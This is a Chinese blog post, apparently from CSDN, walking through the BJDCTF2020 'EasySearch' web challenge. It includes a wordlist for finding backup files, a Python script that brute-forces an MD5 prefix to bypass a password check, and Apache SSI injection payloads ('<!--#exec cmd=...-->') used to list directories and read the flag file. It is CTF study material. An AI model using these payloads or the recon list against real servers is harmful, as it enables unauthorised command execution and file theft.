[BJDCTF2020]EasySearch (SSI注入漏洞)

于 2024-07-30 19:51:08 发布
阅读量469 收藏 5
点赞数 9
分类专栏: CTF web题目 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/140803572
版权

这题ctrl+U发现往index.php提交数据,但是我目录,git泄露,sqlmap,爆破admin密码都没有作用,数据包页面也没有什么重置密码注册的功能

这种三无题多半是要拿源码做的,我又拿我备份文件字典扫了一下结果发现index.php.swp为源码备份文件,字典也给你们丢下面了

常见的网站源码备份文件

dweb.tar
website.tar
backup.tar
back.tar
www.tar
wwwroot.tar
temp.tar
web.tar.gz
website.tar.gz
backup.tar.gz
back.tar.gz
www.tar.gz
wwwroot.tar.gz
temp.tar.gz
web.zip
website.zip
backup.zip
back.zip
www.zip
wwwroot.zip
temp.zip
web.rar
website.rar
backup.rar
back.rar
WWW.rar
wwwroot.rar
temp.rar
.index.php.swp
.index.php~
index.php.bak_Edietplus
index.php.~
index.php.~1~
index.php
index.php~
index.php.rar
index.php.zip
index.php.7z
index.php.tar.gz
www.7z
web.7z
web.tar
index.phps
index.php.swp
index.php.swo
index.php.php~
index.php.bak
index.php.txt
index.php.old

审计代码:

该代码定义了一个名为get_hash()的函数,该函数用于生成一个SHA1哈希值。

在函数内部,首先定义了一个包含字母、数字和特殊字符的字符串$chars,用于生成随机字符串。然后使用mt_rand()函数从$chars字符串中随机选择5次字符,并将这5个字符拼接起来,形成一个随机字符串$random。

接下来,使用uniqid()函数生成一个唯一的字符串,并将其与$random拼接在一起,形成最终的字符串$content。

最后,使用sha1()函数对$content进行SHA1哈希运算,并返回哈希值。

因此,调用get_hash()函数将返回一个随机生成的SHA1哈希值。

下面这里发现只要username存在不为空,并且只有截取md5函数加密后的password前六个字符等于6d0bc1,才能进行下面的写文件操作

我用ai写了个python脚本,通过枚举的方式找到满足条件的字符串。

import hashlib

def generate_md5(prefix):
    count = 0
    while True:
        data = prefix + str(count)
        md5_hash = hashlib.md5(data.encode()).hexdigest()
        if md5_hash.startswith(prefix):
            return md5_hash, data
        count += 1

prefix = input("请输入六个字符的前缀:")
md5_hash, data = generate_md5(prefix)
print("MD5值:", md5_hash)
print("加密前的数据:", data)

运行结果

找个网站加密发现确实是以6d0bc1开头的

username随便输,密码输入脚本跑出来的加密前数据成功弹窗说明成功绕过

因为这里写了头部数据格式,在index.php数据包中发现生成的文件路径

进来后又不知道干嘛了,看到有个ip,XFF试了一下没鸟用

整了半天没办法了去看看别人wp发现又是个新知识点,参考文章:

Apache SSI 远程命令执行漏洞(SSI注入漏洞)_<!--#exec cmd="ls" -->-CSDN博客

Apache SSI 远程命令执行漏洞
当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd="ls /" -->语法来执行命令。

使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。

构造payload:username=<!--#exec cmd="ls" -->密码输入6d0bc14719749

此时命令已经写入到shtml文件里面了,只需要访问即可执行

数据包中找到路径

发现成功执行了!

看看上机目录,构造payload:<!--#exec cmd="ls ../" -->       密码6d0bc14719749

直接用他的输入框输就行了

发现成功执行,这玩意一看就是放flag的地方

最终payload:

用户名<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2" -->

密码6d0bc14719749

成功拿到flag

孤丞OVO
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 2942
buuctf 源码泄露 ssi远程命令执行漏洞
[BJDCTF2020]EasySearch Apache SSI漏洞
m0_64180167的博客
09-20 471
这道题有点意思 是SSI 漏洞照样 我们先熟悉SSI漏洞是什么。
BUUCTF-WEBBJDCTF2020EasySearch 1
qq_36410265的博客
02-08 325
SSI(服务端包含)
[BJDCTF2020]EasySearch(ssi漏洞)
Yang_99的博客
09-26 377
1.首页御剑扫描可以发现有index.php.swp,可以查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
[BJDCTF2020]EasySearch
snowlyzz的博客
09-27 187
....
BJDCTF2020 EasySearch
Tajang的大千世界
05-02 589
做了这题,发现自己太年轻,经验太少了,很多知识点都不知道。 打开靶机,两个username,它把后面那个password故意写成的username F12、robots协议、抓包都没发现啥,SQL注入没试 题目名是EasySearch,应该是扫描网站,使用dirsearch扫描 第一个年轻 扫了看不出来哪些敏感文件或url,我只尝试了www.zip,某些常见url,还有看看有没有git泄露,发现也没有,我就没思路了 后来才知道还有index.php.swp这个文件 我们打开文件 第二个年轻 盲目代码审
SSI.zip_SSI_SSI Injection代码
09-22
**SSI注入漏洞** SSI注入,即SSI Injection,是指攻击者通过输入恶意的SSI指令到应用程序中,来利用服务器的SSI功能,获取敏感信息或执行非法操作。这种漏洞常见于用户可控的数据被直接插入到包含SSI指令的页面中,...
ssi.rar_SSI
09-22
SSI(Server-Side Include)是一种在Web服务器端执行的小型脚本语言,常用于动态网页的构建。在本文中,我们将深入探讨SSI在MC9328MX1芯片上运行于uCOS操作系统环境中的实现,以及相关的编程实践。 首先,MC9328MX1...
SSI.zip_SSI
09-19
**SSI(Server Side Include)简介** SSI,全称为Server Side Include,是一种服务器端的脚本语言,主要用于在HTML页面中动态插入服务器上的静态或动态内容。这种技术在Web开发早期非常流行,它允许开发者在不使用...
ssi.zip_SSI
09-23
"ssi.zip_SSI" 指示这是一个与SSI(Server Side Include)相关的压缩包,可能包含一个简化版的SSI框架,用于教学目的。SSI是一种服务器端脚本语言,允许在HTML文件中嵌入动态内容,如时间戳、文件包含等。 **描述...
《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》
2302_77186925的博客
07-24 1696
“微软蓝屏”事件暴露了网络安全哪些问题
网络安全之初始访问阶段攻防手段(三)
子非渔
07-25 1067
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
非科班出身的你,如何转行web安全工程师?零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-29 290
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。那么,转行web安全工程师,你需要掌握哪些技能呢?对web安全工程师很感兴趣。对现在的工作没有热情。
“微软蓝屏“事件暴露了网络安全哪些问题?
程序员-张师傅
07-23 921
微软蓝屏事件,尤其是2024年7月19日发生的全球性Windows系统崩溃事件,带来了多方面的深刻教训。
网络安全相关竞赛比赛
黑战士的博客
07-18 1175
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
前端分析-202307110039
最新发布
07-29
前端分析-202307110039
Oracle中文基础PPT
07-29
Oracle中文基础PPT 虽然是10g,但是学习Oracle,10g版本没问题 Less01_DB_Architecture_MB3.ppt Less02_Installation_MB3.ppt Less03_DB_DBCA_MB3.ppt Less04_Instance_TB3.ppt Less05_Storage_TB3.ppt Less06_Users_MB3.ppt Less07_Schema_TB3.ppt Less08_Data_TB3.ppt Less09_Undo_TB3.ppt Less10_Security_MB3.ppt Less11_Network_MB3.ppt Less12_ProactiveM_MB3.ppt Less13_Performance_TB3.ppt Less14_BR_Concepts_MB3.ppt Less15_Backups_TB3.ppt Less16_R
【创新未发表】Matlab实现粒子群优化算法PSO-Kmean-Transformer-BiLSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值